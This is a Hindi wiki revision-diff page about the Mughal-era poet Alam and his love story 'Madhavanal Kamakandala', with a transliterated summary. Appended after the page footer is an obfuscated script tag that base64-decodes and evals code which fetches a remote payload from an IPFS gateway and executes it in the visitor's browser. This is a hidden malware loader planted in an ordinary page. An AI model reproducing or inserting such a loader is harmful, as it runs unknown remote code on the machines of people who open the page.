Difference between revisions of "आलम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "शृंगार" to "श्रृंगार")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''आलम''' [[मुग़ल]] [[अकबर|बादशाह अकबर]] के समय के एक [[मुसलमान]] [[कवि]] थे, जिन्होंने सन् 991 [[हिजरी]] अर्थात [[संवत्]] 1639-40 में 'माधावानल कामकंदला' नाम की प्रेम कहानी [[दोहा]]-[[चौपाई]] में लिखी थी।
+
'''आलम''' [[मुग़ल]] [[अकबर|बादशाह अकबर]] के समय के एक [[मुसलमान]] [[कवि]] थे, जिन्होंने सन् 991 [[हिजरी]] अर्थात् [[संवत्]] 1639-40 में '[[माधवानल कामकंदला]]' नाम की प्रेम कहानी [[दोहा]]-[[चौपाई]] में लिखी थी।
  
 
*इनकी रचना में पाँच-पाँच चौपाइयों (अर्धालियों) पर एक एक [[दोहा]] या [[सोरठा]] है।
 
*इनकी रचना में पाँच-पाँच चौपाइयों (अर्धालियों) पर एक एक [[दोहा]] या [[सोरठा]] है।
*'माधावानल कामकंदला' [[शृंगार रस]] की दृष्टि से ही लिखी जान पड़ती है, आध्यात्मिक दृष्टि से नहीं। इसमें जो कुछ सुरुचिता है, वह [[कहानी]] की है। वस्तु वर्णन, भाव व्यंजना आदि की नहीं है।
+
*'[[माधवानल कामकंदला]]' [[श्रृंगार रस]] की दृष्टि से ही लिखी जान पड़ती है, आध्यात्मिक दृष्टि से नहीं। इसमें जो कुछ सुरुचिता है, वह [[कहानी]] की है। वस्तु वर्णन, भाव व्यंजना आदि की नहीं है।
 
*कहानी भी [[प्राकृत]] या [[अपभ्रंश भाषा|अपभ्रंश]] से चली आती हुई पुरानी है।
 
*कहानी भी [[प्राकृत]] या [[अपभ्रंश भाषा|अपभ्रंश]] से चली आती हुई पुरानी है।
 
*[[कवि]] ने रचना काल का उल्लेख इस प्रकार किया है-
 
*[[कवि]] ने रचना काल का उल्लेख इस प्रकार किया है-

Latest revision as of 07:58, 7 November 2017

alam mugal badashah akabar ke samay ke ek musalaman kavi the, jinhoanne sanh 991 hijari arthath sanvath 1639-40 mean 'madhavanal kamakandala' nam ki prem kahani doha-chaupaee mean likhi thi.

  • inaki rachana mean paanch-paanch chaupaiyoan (ardhaliyoan) par ek ek doha ya soratha hai.
  • 'madhavanal kamakandala' shrriangar ras ki drishti se hi likhi jan p dati hai, adhyatmik drishti se nahian. isamean jo kuchh suruchita hai, vah kahani ki hai. vastu varnan, bhav vyanjana adi ki nahian hai.
  • kahani bhi prakrit ya apabhransh se chali ati huee purani hai.
  • kavi ne rachana kal ka ullekh is prakar kiya hai-

dillipati akabar suratana . saptadip mean jaki ana
dharamaraj sab des chalava . hiandoo-turuk panth sab lava
san nau sai ikkanabe ahi. karauan katha au bolauan tahi


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sambandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>